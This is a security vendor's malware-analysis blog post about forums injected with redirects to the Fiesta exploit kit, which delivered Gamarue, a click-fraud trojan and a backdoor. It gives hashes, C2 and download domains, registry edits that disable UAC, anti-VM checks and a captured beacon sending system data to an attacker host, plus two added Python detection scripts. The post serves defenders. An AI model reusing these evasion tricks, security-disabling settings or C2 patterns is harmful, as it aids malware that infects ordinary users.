Channel: Paul Kimayong – Cyphort

DIY Chatroom and over a hundred forums injected with malware


Cyphort Labs discovered a malware campaign attacking over a hundred popular forum websites. The sites run outdated software, so a vulnerability in that software was likely used to compromise them and inject the malware redirection code. The injection redirects to an exploit kit that downloads encrypted Gamarue malware, which is sandbox-aware (it does not execute in virtual environments). As of Apr 8, 2015 the campaign is still ongoing. Below we analyze one of the infection chains, which happens to have minimal detection on VirusTotal.


On April 6, 2015 Diychatroom.com was redirecting users to Fiesta Exploit Kit. It delivers a multi-stage binary payload that involves several malware families.  

 The affected websites include:

  • www.Diychatroom.com
  • www.dogforums.com
  • www.e-cigarette-forum.com
  • www.excelforum.com
  • www.goldenretrieverforum.com
  • www.horseforum.com
  • www.loverslab.com
  • www.ps3news.com
  • www.scubaboard.com
  • www.visajourney.com
  • www.wranglerforum.com
  • www.wrestlingforum.com
  • and many others, 122 in total!

Many of the domains are owned by VerticalScope, a private company with 120 employees headquartered in Toronto, Canada. It specializes in buying and promoting websites and forums, using the large number of generic domain names it has acquired over the past decade. VerticalScope has over 400 websites with a combined reach of more than 80 million unique visitors per month.

Diychatroom.com Infection

The infection chain is as follows:

diychatroom.com
  --> numerarm.org (redirect URL)
      --> http://livefastmap.eu/xxx1 (Fiesta EK landing)
      --> http://livefastmap.eu/xxx2 (Flash exploit)
      --> http://livefastmap.eu/xxx3 (binary payload)

This EK is heavily obfuscated but after several layers of deobfuscation, it clearly reveals what it tries to do. It exploits the following vulnerabilities: 

  • CVE-2013-2551 (IE)
  • CVE-2015-0313 (Flash)

[Figure: CVE-2013-2551 exploit code]

[Figure: First layer of Flash using LoadBytes() to load the second layer]

[Figure: Second layer of Flash, exploiting CVE-2015-0313]

 Cyphort detects the infection through its chain heuristics engine and browser cooker engine.

 

Payload

The payload arrives encrypted over the network. It is a multi-stage malware that involves two files obtained from the dropper's resource section and one file that is downloaded.

  • 77f22bfc9cf7e46c6e738d8b68ad19f6   – Main Dropper
  • c091894cd23d49a14d5cabf0d60c379c  – Gamarue
  • 2e543c5c9f1df385661d6e527eff2f46 – TrojanClicker.FleerCivet
  • 7a6229f6afe767009fe22a119c4165a1 – Backdoor.Ruperk

At the time of discovery, only minimal detection was observed on VirusTotal. Cyphort’s Advanced Threat Detection platform detects all these files.

 

Main Dropper

The main dropper is armored and will not execute in a virtual environment.

Armoring:

  • anti-virtualbox
  • anti-qemu
  • anti-vmware

It checks for the strings VBOX, QEMU and VMWARE in the device property returned by SetupDiGetDeviceRegistryPropertyW.


On a non-virtual system, it drops two files obtained from its resource section into the %TEMP% folder and executes them via CreateProcess or ShellExecute.

 

 

Resource 1

Family: Gamarue

[SHA1:] 039D532C02B7441D9D8C0DBB4D67FDC3AF428DD2

[MD5:] c091894cd23d49a14d5cabf0d60c379c

When executed, it creates a new msiexec.exe process and injects code into it. It drops a copy of itself in %ALLUSERPROFILE% using a random filename, e.g., “mssffnmc.exe”.

It creates an autostart entry as follows:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

Value: {random}

Data : %ALLUSERPROFILE%\{copy of itself}

 

It disables some Windows security settings by changing the values of the following registry entries:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

Value: “EnableLUA”

Data: “0”

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Value: “TaskbarNoNotification”

Data: “1”

Value: “HideSCAHealth”

Data: “1”

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Value: “Hidden”

Data: “2”
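As an added example that is not part of the original post, the following Python checks a registry export (the text produced by a reg export) for the autostart entry and the policy changes listed above. The dump it runs on is a constructed sample; the key paths and data values are the ones given in this post.

```python
import re

# Constructed "reg export" style dump, not from the post: the values the post attributes
# to Gamarue plus one benign value (ConsentPromptBehaviorAdmin) that must not be flagged.
SAMPLE_REG_EXPORT = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"xq3kd"="C:\\Documents and Settings\\All Users\\mssffnmc.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000005
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"TaskbarNoNotification"=dword:00000001
"HideSCAHealth"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000002
"""
POLICY_RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"
POLICIES = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies"
EXPECTED_CHANGES = {  # (key, value name) -> data the post says Gamarue writes there
    (POLICIES + r"\System", "EnableLUA"): 0,
    (POLICIES + r"\Explorer", "TaskbarNoNotification"): 1,
    (POLICIES + r"\Explorer", "HideSCAHealth"): 1,
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "Hidden"): 2,
}
SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')

def parse_reg_export(text):
    """Map lower-cased key path -> {lower-cased value name: data}; dword -> int, string -> str."""
    values, key = {}, None
    for line in text.splitlines():
        if m := SECTION_RE.match(line):
            key = m.group(1).lower()
            values.setdefault(key, {})
        elif key is not None and (m := VALUE_RE.match(line)):
            name, dword, string = m.groups()
            # .reg files double every backslash inside string data
            data = int(dword, 16) if dword is not None else string.replace("\\\\", "\\")
            values[key][name.lower()] = data
    return values

def find_gamarue_indicators(text):
    values = parse_reg_export(text)
    findings = []
    # Any entry under the policy Run key is an autostart; Gamarue uses a random value name there.
    for name, data in values.get(POLICY_RUN_KEY.lower(), {}).items():
        findings.append(f"policy Run autostart: {name} -> {data}")
    for (key, name), bad in EXPECTED_CHANGES.items():
        if values.get(key.lower(), {}).get(name.lower()) == bad:
            findings.append(f"{key}\\{name} = {bad}")
    return findings
```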

 

It connects to its CnC server, nindziaboy.net to send data and receive commands. Communication to the server is encrypted and depending on the reply, it can perform the following commands:

  • Report 
  • Update
  • Start

 


It also performs DNS requests for the following domains:

  • africa.pool.ntp.org
  • oceania.pool.ntp.org
  • asia.pool.ntp.org
  • south-america.pool.ntp.org
  • north-america.pool.ntp.org
  • europe.pool.ntp.org

 

Resource 2

Family: TrojanClicker.FleerCivet

[SHA1:] 79137D2553FD19C2EB287957BB7E5506DF88CD02

[MD5:] 2e543c5c9f1df385661d6e527eff2f46

 

This malware’s main purpose is to open several hidden IE instances that access websites.

Similar to the main dropper, it exits and does nothing if it detects that it is running under a virtual environment.

It drops a copy of itself as Update.exe in the %Windows%\FrameworkUpdate folder, then it creates a service for itself with name as “SystemUpdate”.

 

It injects into one of iexplore.exe, chrome.exe, firefox.exe or explorer.exe to gain elevated privileges and tries to stop the following services:

  • SharedAccess
  • wscsvc
  • MpsSvc
  • WinDefend
  • wuauserv
  • BITS
  • ERSvc
  • WerSvc

It creates five threads that fire a hidden Internet Explorer Browser that visits the following URLs:

  • http://videosearcher{.}org/4ff9ae/9126
  • http://truesearchresults{.}com/?aff=7733&saff=9126

 

[Figure: the routine that creates several hidden IE instances to visit a URL]

Afterwards, the following network connections were observed:

GET /analytics.js HTTP/1.1

Accept: */*

Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)

Accept-Encoding: gzip, deflate

Host: www.google-analytics.com

Connection: Keep-Alive

 

GET /hit?t44.6;r;s1162*589*32;uhttp%3A//truesearchresults.com/casino.php%3Fparams%3D9kwXw9wr5uVwtaXFgiQ%252FkHA8rqoFYQ3%252FQyL57Nj%252BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%252F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%252BihDRQfDOiVNwnSfCX%252FAkh8UtPfNP%252B%252FH0WEbMuVy38gjCQ%253D;0.7172015003936206 HTTP/1.1

Accept: */*

Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)

Accept-Encoding: gzip, deflate

Host: counter.yadro.ru

Connection: Keep-Alive

 

Additional details:

It creates a mutex with the following name:

  • _HSJ909NJJNJ90203_

It connects to the following URL to get the geolocation of the victim’s machine:

  • www.telize.com/geoip

If it detects that it is running on a 64-bit system, it loads its 64-bit counterpart, which is found in its resource section.

 

Downloaded Component

Family: Backdoor.Ruperk

[SHA1:] BD16D28FEECC00A744BFED06AB70C918FEE404C3

[MD5:] 7a6229f6afe767009fe22a119c4165a1

 

This file is downloaded from the following link:

  • http://clenodium{.}eu/tmp/file{.}exe

 

When executed, it drops a copy of itself in %LocalSettings%\ApplicationData\{random}\{random.exe}.

It creates a new process of wuauclt.exe and injects into it. It then contacts the following CnC server and waits for commands:

  • dobavki-shop.com

 

Network Connection

GET /getter.php?mode=reg&id=xxxxx80-d14e-49fe-9c0a-1af5058475e7&os=5132&vga=VMware%20SVGA%20II&ocl=0 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: dobavki-shop.com

Connection: Keep-Alive

 

As the above CnC request shows, it sends system information in clear text, including:

  • MachineGuid
  • OS version
  • Display device (monitor) name

 

It waits for the following commands from the server:

  • #none – do nothing
  • #stop
  • #update – update self
  • #update_miner
  • #opencl
  • #destruct – kill self
  • #error
  • #download  – Download files


The server evaluates the information received from the infected computers and replies back with any one of the above listed commands. When the trojan is executed in a virtual environment (or sandbox) it chooses to stay low and replies with command #none.
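As an added example not from the original post, this Python parses the registration beacon shown above out of constructed proxy log lines and flags, from the vga field alone, the clients the server would treat as sandboxes and answer with #none. The log format and client addresses are assumptions; the adapter strings it matches are the VBOX/QEMU/VMWARE strings the dropper itself checks.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines (timestamp, client, method, URL), not from the post; the
# second line carries the same query string as the registration request shown above.
SAMPLE_PROXY_LOG = """\
2015-04-06T10:01:02Z 10.0.0.5 GET http://www.google-analytics.com/analytics.js
2015-04-06T10:01:09Z 10.0.0.5 GET http://dobavki-shop.com/getter.php?mode=reg&id=xxxxx80-d14e-49fe-9c0a-1af5058475e7&os=5132&vga=VMware%20SVGA%20II&ocl=0
2015-04-06T10:02:15Z 10.0.0.7 GET http://dobavki-shop.com/getter.php?mode=reg&id=11111111-2222-3333-4444-555555555555&os=5132&vga=Intel(R)%20HD%20Graphics&ocl=1
2015-04-06T10:03:00Z 10.0.0.9 GET http://example.org/getter.php?mode=download
"""

# Strings the dropper looks for to decide it is inside a VM; a display adapter name
# containing one of them is what a sandbox reveals to the server in the 'vga' field.
VIRTUAL_ADAPTER_MARKERS = ("vmware", "vbox", "qemu")

def parse_registration_beacon(url):
    """Return the clear-text fields of a 'mode=reg' beacon, or None if url is not one."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/getter.php"):
        return None
    q = parse_qs(parts.query)
    if q.get("mode") != ["reg"] or not all(k in q for k in ("id", "os", "vga", "ocl")):
        return None
    vga = q["vga"][0]
    return {
        "host": parts.hostname,
        "machine_guid": q["id"][0],
        "os": q["os"][0],
        "vga": vga,
        "opencl": q["ocl"][0] == "1",
        # the same test the server can apply before deciding to reply with #none
        "virtual_display": any(m in vga.lower() for m in VIRTUAL_ADAPTER_MARKERS),
    }

def scan_proxy_log(text):
    """Return one record per registration beacon found, tagged with the client address."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and (beacon := parse_registration_beacon(fields[3])):
            beacon["client"] = fields[1]
            hits.append(beacon)
    return hits
```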

Through our chain heuristics and browser cooker engine, we discovered that several other forum sites are also infected with this same malicious attack. These forum sites are powered by vBulletin or by IP Board.

Early this year, the Sucuri blog reported a serious vulnerability affecting vBSEO that allows an attacker to remotely execute malicious PHP code on your website. vBSEO is a component of vBulletin, but it has already been discontinued due to several vulnerabilities. The sad fact is that some websites still use it.

For website administrators affected by this attack, Sucuri posted the following options:

  1. Completely remove vBSEO from your site – It is not supported anymore
  2. Apply the patch recommended by the vBulletin team
  3. Put your site behind a Website Firewall, this will prevent the exploitation of this vulnerability and many others.

 For visitors of forum sites, ensure that you are running the latest version of browsers and flash as this attack involves IE and flash exploits.

Connecting Dots

For the curious threat researchers out there, you may wonder why the armored malware completely avoided all three popular virtualization environments (VirtualBox, Qemu, and Vmware), including Vmware, which is a fairly popular platform adopted by many businesses. Indeed, Cyphort Labs has seen malware samples that singled out VirtualBox and Qemu for evasion but were happy to play inside Vmware. In those cases, the objective of the armoring design seems to be anti-analysis or anti-sandboxing. As we have mentioned earlier, this malware campaign has targeted over a hundred forums, which seem to serve mostly individual home users. As we saw from the attack payload (TrojanClicker.FleerCivet) earlier, it is part of a click fraud campaign. For click fraud to look legitimate, it had better come from home users, so how many home users’ machines would actually run VirtualBox, Qemu, or Vmware? Very few. So we believe that this malware pack is designed for a click fraud campaign and for distribution using watering hole attacks. The armoring against all the virtualization environments is done to avoid detection by anti-click-fraud systems.

 Special thanks to Alex Burt, McEnroe Navaraj, Palaniyappan Bala, and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post DIY Chatroom and over a hundred forums injected with malware appeared first on Cyphort.

